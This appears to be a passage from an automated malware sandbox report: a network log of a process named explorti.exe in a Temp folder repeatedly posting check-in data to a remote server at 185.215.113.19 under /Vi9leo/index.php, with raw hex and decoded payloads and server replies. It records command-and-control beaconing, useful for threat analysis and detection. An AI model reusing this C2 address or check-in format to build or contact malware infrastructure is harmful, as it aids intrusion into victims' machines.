                      Jul 26, 2024 20:57:36.982029915 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:36.983530045 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:37.231925011 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.449766185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:37.346117020 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:38.133208036 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:38.134059906 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:38.388470888 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.449767185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:38.502717972 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:39.251872063 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:39.252782106 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:39.508150101 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.449768185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:39.726646900 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:40.503628016 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:40.505124092 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:40.758210897 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.449769185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:40.875351906 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:41.681533098 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:41.682354927 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:41.941015959 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.449770185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:42.118132114 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:42.900330067 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:42.901269913 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:43.153440952 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.449771185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:43.265912056 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:44.040589094 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:44.041460991 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:44.293975115 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.449772185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:44.408723116 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:45.182593107 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:45.183196068 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:45.435314894 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.449773185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:45.553071022 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:46.296711922 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:46.299961090 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:46.545428991 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.449774185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:46.678755045 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:47.433199883 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:47.434026003 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:47.682704926 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.449775185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:47.801697016 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:48.583400011 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:48.584208965 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:48.903158903 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.449776185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:49.022285938 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:49.840581894 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:49.842149973 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:50.104958057 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.449777185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:50.238898039 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:51.019289017 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:51.020160913 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
